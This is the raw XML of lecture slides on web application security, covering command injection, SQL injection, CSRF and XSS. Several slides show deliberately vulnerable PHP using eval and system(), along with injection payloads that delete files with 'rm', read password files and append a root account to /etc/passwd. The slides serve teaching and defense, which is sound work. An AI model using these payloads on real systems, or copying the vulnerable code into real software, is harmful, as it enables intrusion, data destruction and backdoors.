              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Sanitizing before or after storing in database </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Dynamic versus static defense techniques</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Good ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Static analysis (e.g. ASP.NET has support for this) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Taint tracking </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Framework support </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Continuous testing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Bad ideas</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Blacklisting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Manual sanitization</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General code injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack goal: execute arbitrary code on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>code injection based on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   (PHP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://site.com/calc.php        (server side calculator)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>http://site.com/calc.php?exp=“ 10 ; system(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> *.*’) ”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="3657600"/>
            <a:ext cx="3505200" cy="1476375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  $in = $_GET[‘exp']; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>('$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ans</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = ' . $in . ';'); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">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304800"/>
            <a:ext cx="8229600" cy="838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code injection using   system()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1112837"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Example: PHP server-side code for sending email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker can post</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    OR</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1295400" y="2105025"/>
            <a:ext cx="7064375" cy="1019175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $email = $_POST[“email”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  $subject = $_POST[“subject”]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  system(“mail </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>email –s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>subject &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>joinmynetwork</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3733800"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yourdomain.com/mail.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>email=hacker@hackerhome.net &amp;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     subject=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="5410200"/>
            <a:ext cx="7064375" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>yourdomain.com/mail.php?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     email=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hacker@hackerhome.net&amp;subject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     echo “evil::0:0:root:/:/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"&gt;&gt;/etc/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mn-lt"/>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3076" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1283077" name="Rectangle 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Database queries with PHP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1381379" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Sample PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$recipient = $_POST[‘recipient’];  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PersonID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM Person WHERE 	Username='$recipient'";  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = $db-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>What if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘recipient’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>is malicious string that changes the meaning of the query?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6169869" y="990600"/>
            <a:ext cx="2059731" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(the wrong way)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>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flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="FF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31041</TotalTime>
  <Words>2456</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>521</Paragraphs>
  <Slides>58</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Default Design</vt:lpstr>
      <vt:lpstr>Image</vt:lpstr>
      <vt:lpstr>Acrobat Document</vt:lpstr>
      <vt:lpstr>Web Application Security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Three top Web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>General code injection attacks</vt:lpstr>
      <vt:lpstr>Code injection using   system()</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Database queries with PHP</vt:lpstr>
      <vt:lpstr>Basic picture: SQL Injection</vt:lpstr>
      <vt:lpstr>Example:  buggy login page  (ASP)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr>Even worse</vt:lpstr>
      <vt:lpstr>Even worse …</vt:lpstr>
      <vt:lpstr>Getting private info</vt:lpstr>
      <vt:lpstr>Getting private info</vt:lpstr>
      <vt:lpstr>Results</vt:lpstr>
      <vt:lpstr>Examples</vt:lpstr>
      <vt:lpstr>Preventing SQL Injection</vt:lpstr>
      <vt:lpstr>Parameterized/prepared  SQL</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery</vt:lpstr>
      <vt:lpstr>Recall: session using cookies</vt:lpstr>
      <vt:lpstr>Basic picture</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery  (CSRF)</vt:lpstr>
      <vt:lpstr>Form post with cookie</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Secret Token Validation</vt:lpstr>
      <vt:lpstr>Referer Validation</vt:lpstr>
      <vt:lpstr>Referer Validation Defense</vt:lpstr>
      <vt:lpstr>Referer Privacy Problems</vt:lpstr>
      <vt:lpstr>Custom Header Defense</vt:lpstr>
      <vt:lpstr>Cross Site Scripting  (XSS)</vt:lpstr>
      <vt:lpstr>Three top web site vulnerabilites</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>XSS example: vulnerable site</vt:lpstr>
      <vt:lpstr>Bad input</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>What is XSS?</vt:lpstr>
      <vt:lpstr>Basic scenario: reflected XSS attack</vt:lpstr>
      <vt:lpstr>            2006 Example Vulnerability</vt:lpstr>
      <vt:lpstr>American Express Site</vt:lpstr>
      <vt:lpstr>Adobe PDF viewer “feature”</vt:lpstr>
      <vt:lpstr>Here’s how the attack works:</vt:lpstr>
      <vt:lpstr>And if that doesn’t bother you...</vt:lpstr>
      <vt:lpstr>Reflected XSS attack</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>MySpace.com   (Samy worm)</vt:lpstr>
      <vt:lpstr>Stored XSS using images</vt:lpstr>
      <vt:lpstr>Lots more information about attacks</vt:lpstr>
      <vt:lpstr>Complex problems in social network sites</vt:lpstr>
      <vt:lpstr>Defenses at server</vt:lpstr>
      <vt:lpstr>How to Protect Yourself (OWASP)</vt:lpstr>
      <vt:lpstr>Input data validation and filtering</vt:lpstr>
      <vt:lpstr>Output filtering / encoding</vt:lpstr>
      <vt:lpstr>HttpOnly Cookies     IE6 SP1,   FF2.0.0.5</vt:lpstr>
      <vt:lpstr>Points to remember</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Games and the Impossibility of Realizable Ideal Functionality</dc:title>
  <dc:subject/>
  <dc:creator>Ante Derek</dc:creator>
  <cp:lastModifiedBy>Nick Feamster</cp:lastModifiedBy>
  <cp:revision>6671</cp:revision>
  <cp:lastPrinted>1998-03-10T18:42:22Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1997-09-07T20:51:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-11-01T19:43:22Z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1</vt:i4>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="ScreenUsage">
    <vt:i4>1</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C:\Documents\cs242\notes\web-slides</vt:lpwstr>
  </property>
</Properties>
</file>